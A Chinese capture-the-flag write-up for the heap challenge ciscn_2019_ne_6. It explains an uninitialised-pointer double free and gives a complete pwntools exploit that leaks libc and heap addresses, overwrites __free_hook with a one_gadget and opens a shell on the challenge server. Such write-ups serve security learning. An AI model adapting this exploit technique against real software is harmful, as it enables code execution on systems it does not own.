指针未初始化导致double free

ciscn_2019_ne_6

checksec:

1

漏洞点:

2

3

未初始化的指针ptr,通过构造s来达到任意地址释放,形成double free

这里free没有清空内容,我们释放一个chunk进unsortedbin,再申请回来就得到了libc地址

# Stage 1 of the writeup: libc leak.  `add`/`free`/`show`, `io` and `libc`
# are the helpers and objects defined in the full script further down.
add(0x420,b'a\n') #0   # sized so that freeing it lands in the unsorted bin (per the writeup)
add(0x80,b'a'*0x80) #1
add(0x80,b'b'*0x80) #2   # two equal-size chunks, reused for the heap leak in the next stage



free(0)            # free() does not wipe the chunk, so arena pointers stay inside
add(0x420,b'\n') #0   # take the same chunk back with a single newline written into it
show()

# The printed value is an arena pointer; 96 + 0x10 is its distance from
# __malloc_hook in this libc build (offsets as given by the writeup — confirm for other builds).
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base ----------------->'+hex(libc_base))

再泄露一个chunk地址

# Stage 2 of the writeup: heap leak.  Helpers and `io` come from the full script below.
free(2)
free(1)

add(0x80,b'\n')    # chunk 1 comes back still holding a heap pointer left behind by free()
show()
io.recvuntil(b'1: ')   # show() prints entries as "<index>: <content>"; read chunk 1's bytes

heap_base = u64(io.recv(6).ljust(8,b'\x00'))   # 6 raw bytes of the pointer, zero-extended to 8
success('heap_base ----------------->'+hex(heap_base))

控制ptr造成doublefree,改freehook就完事

# Stage 3 of the writeup: double free via the uninitialised pointer, then
# overwrite __free_hook.  `free_hook` and `one` are defined in the full script below.
# Index -1 with a crafted password buffer: per the writeup the uninitialised
# ptr picks up heap_base from this buffer, so the chunk at heap_base is freed again.
free(-1,b'\x00'*(0x20)+p64(heap_base))

# After the double free, consecutive 0x80 allocations are used to steer an
# allocation onto __free_hook; the last one writes one[1]+libc_base there.
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(one[1]+libc_base)+b'\n')

free(0)   # any free() now goes through the overwritten __free_hook

全部exp:

# -*- coding: utf-8 -*-
# Writeup script for ciscn_2019_ne_6.  Bug class (from the writeup): an
# uninitialised pointer lets free() act on an attacker-chosen address
# (double free), and free() does not clear chunk contents, so stale
# libc/heap pointers can be read back.  The fix for this class is to
# initialise every pointer and NULL it after free().
from pwn import*
# log_level='debug' echoes every byte exchanged with the service
context(os='linux',arch='amd64',log_level='debug')

#io = process('./ciscn_2019_ne_6')
io = remote('node4.buuoj.cn',29229)   # remote instance used by the writeup; swap for the local line above
elf = ELF('./ciscn_2019_ne_6')

# libc shipped with the challenge; the symbol offsets used below are read from it
libc = ELF('./libc-2.27.so')
# libc-relative offsets; presumably one_gadget candidates for this build — only one[1] is used below
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]

def show():
    """Menu option 1 (show): the caller reads the printed chunk contents from `io`."""
    io.sendlineafter(b'>>',b'1')

def add(size,content):
    """Menu option 2 (add): allocate `size` bytes and fill them with `content`.

    The password prompt is answered with b'a'.  `content` is sent raw
    (no newline appended), so callers add b'\\n' themselves where needed.
    """
    io.sendlineafter(b'>>',b'2')
    io.sendlineafter(b'passwd:',b'a')
    io.sendlineafter(b'size:',str(size).encode())
    io.sendafter(b'Content:',content)

def edit(index,content):
    """Menu option 3 (edit): overwrite a chunk with `content`.

    NOTE(review): `index` is never sent to the program — confirm the
    prompt sequence against the binary.  This helper is not used by the
    script below.
    """
    io.sendlineafter(b'>>',b'3')
    io.sendlineafter(b'passwd:',b'a')
    io.sendafter(b'Content:',content)

def free(index,passwd = b'a'):
    """Menu option 4 (free) for chunk `index`.

    `passwd` is NUL-padded to 0x28 bytes and sent without a newline; the
    writeup uses this buffer (together with a negative index) to steer
    the uninitialised pointer that free() dereferences.
    """
    io.sendlineafter(b'>>',b'4')
    io.sendafter(b'passwd:',passwd.ljust(0x28,b'\x00'))
    io.sendlineafter(b'index:',str(index).encode())

# --- Stage 1: libc leak (free() leaves chunk contents in place) ---
add(0x420,b'a\n') #0   # sized so that freeing it lands in the unsorted bin (per the writeup)
add(0x80,b'a'*0x80) #1
add(0x80,b'b'*0x80) #2   # two equal-size chunks, reused for the heap leak below



free(0)            # chunk 0 is not wiped on free, so arena pointers stay inside
add(0x420,b'\n') #0   # take the same chunk back with only a newline written into it
show()

# The printed value is an arena pointer; 96 + 0x10 is its distance from
# __malloc_hook in this libc build (offsets as given by the writeup — confirm for other builds).
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base ----------------->'+hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']   # target address overwritten in stage 3

# --- Stage 2: heap leak ---
free(2)
free(1)

add(0x80,b'\n')    # chunk 1 comes back still holding a heap pointer left behind by free()
show()
io.recvuntil(b'1: ')   # show() prints entries as "<index>: <content>"; read chunk 1's bytes

heap_base = u64(io.recv(6).ljust(8,b'\x00'))   # 6 raw bytes of the pointer, zero-extended to 8
success('heap_base ----------------->'+hex(heap_base))

# --- Stage 3: double free via the uninitialised pointer, then overwrite __free_hook ---
# Index -1 with a crafted password buffer: per the writeup the uninitialised
# ptr picks up heap_base from this buffer, so the chunk at heap_base is freed again.
free(-1,b'\x00'*(0x20)+p64(heap_base))

# After the double free, consecutive 0x80 allocations are used to steer an
# allocation onto __free_hook; the last one writes one[1]+libc_base there.
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(one[1]+libc_base)+b'\n')

free(0)   # any free() now goes through the overwritten __free_hook

io.interactive()
